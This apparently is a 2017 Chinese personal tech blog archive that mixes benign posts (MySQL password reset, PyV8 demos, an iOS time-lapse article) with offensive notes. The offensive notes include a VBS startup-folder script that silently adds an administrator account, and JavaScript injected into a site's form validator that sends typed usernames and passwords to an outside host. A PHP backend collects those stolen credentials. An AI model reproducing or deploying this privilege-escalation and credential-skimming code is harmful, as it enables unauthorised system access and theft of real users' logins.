2017年3月2日星期四

提权记录

最佳拍档A  -- 检索没有安装的补丁编号
最佳拍档B  --  查找相关漏洞编号的使用范围,包括系统版本
渗透工具集合 -- 含有大部分漏洞利用程序

 webshell写入启动项目提权

set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user 用户名 密码  /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators 用户名 /add",0)

保存为xx.vbs
放入 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 ,前提可写

有一条命令可以提取出补丁的详细信息:
        wmic qfe list full

参考链接:
1. Web安全之Windows提权

mysql密码忘记

按照以下的顺序执行
# /etc/init.d/mysql stop
# mysqld_safe --user=mysql --skip-grant-tables --skip-networking &
到这一步,直接再一个回车,&表示后台运行

# mysql -u root mysql
mysql> UPDATE user SET Password=PASSWORD('newpassword') where USER='root';
这里newpassword,就是你新密码 

mysql> FLUSH PRIVILEGES;
mysql> quit

# /etc/init.d/mysql restart
# mysql -uroot -p
Enter password: <输入新设的密码newpassword>

mysql>

XSS原理到后台接收的实践

首先要有一台VPS,一个域名

xss 代码存放处

路径: /Include/Script/validator.js
函数位置: jQuery.fn.checkForm  下面的 form.submit
js代码: document.getElementById('mx').src="http://www.sherpper.com:8680/test.php?"+encodeURI('pass=' + document.getElementById('TextBox2').value)+encodeURI('&user=' + document.getElementById('TextBox1').value);

构造代码的过程中,使用了两个函数 escape 与 encodeURI 。
注意escape组成的url是不能提交成功的,需要使用encodeURI.

html代码:<img src="" id="mx" style="display: none;"/>

安装mysql,并且创建数据库

        创建数据库
                  Create database test;

创建表
create table login
  (
   id int not null AUTO_INCREMENT,
   username char(15) NOT NULL,
   password char(15) NOT NULL,
   PRIMARY KEY(id)

   )ENGINE = InnoDB;

        想看之前创建的表
                show create table xss;

php 后台接收代码
  
<?php
session_start();

$_SESSION['attempt'] = isset($_SESSION['attempt'])?$_SESSION['attempt']:0;

$_SESSION['attempt'] += 1;

if ($_SESSION['attempt'] >= 100) {
    die("Too Frequent");
}

$mysqli = new mysqli("localhost", "root", "123456", "evil");
if ($mysqli->connect_errno) {
    echo "Failed to connect to MySQL: (" . $mysqli->connect_errno . ") " . $mysqli->connect_error;
}

$passwd = $_GET['pass'];
$users = $_GET['user'];

$time = date("Y-m-d H:i:s", time());

$items = explode(";", $content);

$js = '';

foreach ($items as $item) {
    $js .= ("document.cookie='".trim($item)."';");
}

echo 'js: ' , $js , '<br>' , 'time: ' , $time , '<br>';

if ($stmt = $mysqli->prepare("insert into xss(username, password, time, js) values (?, ?, ?, ?)")) {
    $stmt->bind_param('ssss', $passwd, $users, $time, $js);
    $result = $stmt->execute();
    if ($result) {
        echo "Collected Your Cookie <br>" ;
    }
}

echo 'password: ', $passwd, '<br>', 'username: ', $users;

?>
这次在linux部署LAMP服务器时遇到一些小问题:
环境: debian7(raspberry pi) apache2 PHP mysql
配置完port.conf后,重启出现问题:
          How to fix Apache2 could not reliably determine the server’s fully qualified domain name
下面是解决方法,附上链接
       echo "ServerName localhost" | sudo tee /etc/apache2/conf.d/fqdn

2017年2月11日星期六

[转]iOS 8 延时摄影功能背后隐藏的小秘密

原文链接
       近日 Studio Neat 就揭露了这个延时摄影功能背后的秘密。事实证明,苹果这样 做是非常明智的。苹果通过“动态间隔选择”来将延时摄影功能的速度加倍并且随着录像的持续时间翻倍而在每秒内拍摄尽可能多的一半的照片。听起来很复杂?不 要紧,看下面的图就一目了然了。


  这意味着当你拍摄一段时长 5 分钟的延时视频的话,系统会在每秒内捕获两帧,视频会被剪成 20 秒长,30fps。而一段 40 分钟的延时视频将会是每四秒一帧,也会得到一段长 20 秒的视频。

2017年2月9日星期四

pyv8 正确的使用方法

首先你要安装pyv8模块,如何安装链接
win7 64位系统,最好装PyV8-1.0-preview-r443.win32-py2.7
以下两段pyv8的demo
 
import PyV8

ctxt = PyV8.JSContext()
ctxt.enter()
func = ctxt.eval("""
    (function(){                 # 这行是固定格式
        function VL(a){          # 这行开始才是js代码
            var b = a.trim();
            return b;
        }
        return VL('hayy  ');     # 这行 return是返回到python的命名空间去了
    })
""")

print func()
标注使用pyv8的使用关键点
 
import PyV8
ctxt = PyV8.JSContext()
ctxt.enter()
func = ctxt.eval("""
    (function(){                       # 这行是固定格式
        function hello(){              # 这行开始才是js代码
            return "Hello world.";
        }
        return hello();                # 这行 return是返回到python的命名空间去了
    })
""")
print func()

2017年2月8日星期三

windows 7 以管理员权限运行bat文件

1. 先创建一个bat文件,然后右键创建快捷方式
2. 右键快捷方式图标,如下图
 

 兼容性的以管理员运行是不能勾选的


























2017年2月4日星期六

[转]渗透利器之本地客户端程序密码获取

严重推荐 http://securityxploded.com/password-recovery-tools.php 相关工具
以及 http://www.nirsoft.net/ 相关工具
以下工具均来源于以上站点
原文链接


Github 安全军火库 链接